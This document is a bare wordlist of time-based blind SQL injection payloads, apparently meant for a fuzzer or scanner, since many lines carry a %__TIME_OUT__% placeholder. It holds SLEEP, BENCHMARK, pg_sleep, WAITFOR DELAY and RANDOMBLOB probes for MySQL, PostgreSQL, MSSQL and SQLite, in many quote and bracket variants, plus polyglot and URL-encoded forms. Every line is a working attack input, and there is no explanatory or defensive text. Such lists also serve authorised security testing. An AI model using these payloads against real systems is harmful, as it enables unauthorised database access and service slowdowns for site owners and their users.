vTdvHgFAMBvEJ'); waitfor delay '0:0:6' --
OR NOT 04806=4806-- wXyW
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) 
AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)
1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)
10'XOR(1*if(now()=sysdate(),sleep(6),0))XOR'Z
 ')waitfor%20delay'0%3a0%3a10'--
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%22%2B(select(0)from(select(sleep(6)))v)%2B%22*/
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z 
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
11820*if(now()=sysdate(),sleep(15),0)
11820*if(now()=sysdate(),sleep(6),0)
1;SELECT IF((8303>8302),SLEEP(9),2356)#  
1*sleep(5)
1005*1 
1005+123-118-5
1005/1
1005/(3*2-5)
1005/(5/5)
sleep(5)#
' AND 1=CAST((SELECT version()) AS int) --  
-1' OR 5*5=25 
-1' OR 5*5=26
-1' OR 2*3*1=6 AND 000279=000279
-1' OR 3*2*0=6 AND 000279=000279
-1' OR 3*2*1=6 AND 000279=000279 
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
1 or pg_sleep(%__TIME_OUT__%)--
1) or pg_sleep(%__TIME_OUT__%)--
1)) or pg_sleep(%__TIME_OUT__%)--
1 or sleep(%__TIME_OUT__%)#
1) or sleep(%__TIME_OUT__%)#
1)) or sleep(%__TIME_OUT__%)#
1') WAITFOR DELAY '%__TIME_OUT__%' AND ('1337'='1337
1) WAITFOR DELAY '%__TIME_OUT__%' AND (1337=1337
';%5waitfor%5delay%5'%__TIME_OUT__%'%5--%5
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))YjoC) AND '%'='
AnD SLEEP(%__TIME_OUT__%)
AnD SLEEP(%__TIME_OUT__%)#
AnD SLEEP(%__TIME_OUT__%)--
' AnD SLEEP(%__TIME_OUT__%) ANd '1
and WAITFOR DELAY '%__TIME_OUT__%'
and WAITFOR DELAY '%__TIME_OUT__%'--
") IF (1=1) WAITFOR DELAY '%__TIME_OUT__%'--
ORDER BY SLEEP(%__TIME_OUT__%)
ORDER BY SLEEP(%__TIME_OUT__%)#
ORDER BY SLEEP(%__TIME_OUT__%)--
" or pg_sleep(%__TIME_OUT__%)--
") or pg_sleep(%__TIME_OUT__%)--
")) or pg_sleep(%__TIME_OUT__%)--
' or pg_sleep(%__TIME_OUT__%)--
') or pg_sleep(%__TIME_OUT__%)--
')) or pg_sleep(%__TIME_OUT__%)--
or pg_SLEEP(%__TIME_OUT__%)
or pg_SLEEP(%__TIME_OUT__%)#
or pg_SLEEP(%__TIME_OUT__%)--
" or sleep(%__TIME_OUT__%)#
" or sleep(%__TIME_OUT__%)="
") or sleep(%__TIME_OUT__%)="
")) or sleep(%__TIME_OUT__%)="
' or sleep(%__TIME_OUT__%)#
' or sleep(%__TIME_OUT__%)='
') or sleep(%__TIME_OUT__%)='
')) or sleep(%__TIME_OUT__%)='
or SLEEP(%__TIME_OUT__%)
or SLEEP(%__TIME_OUT__%)#
or SLEEP(%__TIME_OUT__%)--
or SLEEP(%__TIME_OUT__%)="
or SLEEP(%__TIME_OUT__%)='
or WAITFOR DELAY '%__TIME_OUT__%'
or WAITFOR DELAY '%__TIME_OUT__%'--
pg_sleep(%__TIME_OUT__%)--
pg_SLEEP(%__TIME_OUT__%)
pg_SLEEP(%__TIME_OUT__%)#
pg_SLEEP(%__TIME_OUT__%)--
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)--
sleep(%__TIME_OUT__%)#
&&SLEEP(%__TIME_OUT__%)
&&SLEEP(%__TIME_OUT__%)#
&&SLEEP(%__TIME_OUT__%)--
+ SLEEP(%__TIME_OUT__%) + '
SLEEP(%__TIME_OUT__%)#
SLEEP(%__TIME_OUT__%)--
SLEEP(%__TIME_OUT__%)="
SLEEP(%__TIME_OUT__%)='
'&&SLEEP(%__TIME_OUT__%)&&'1
SLEEP(%__TIME_OUT__%)/*' or SLEEP(%__TIME_OUT__%) or '" or SLEEP(%__TIME_OUT__%) or "*/
"));waitfor delay '%__TIME_OUT__%'--
");waitfor delay '%__TIME_OUT__%'--
";waitfor delay '%__TIME_OUT__%'--
'));waitfor delay '%__TIME_OUT__%'--
');waitfor delay '%__TIME_OUT__%'--
';waitfor delay '%__TIME_OUT__%'--
));waitfor delay '%__TIME_OUT__%'--
);waitfor delay '%__TIME_OUT__%'--
;waitfor delay '%__TIME_OUT__%'--
waitfor delay '%__TIME_OUT__%'
waitfor delay '%__TIME_OUT__%'#
waitfor delay '%__TIME_OUT__%'--
") WAITFOR DELAY '%__TIME_OUT__%'--
%' WAITFOR DELAY '%__TIME_OUT__%'--
'))) WAITFOR DELAY '%__TIME_OUT__%'--
';WAITFOR DELAY '%__TIME_OUT__%'--
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
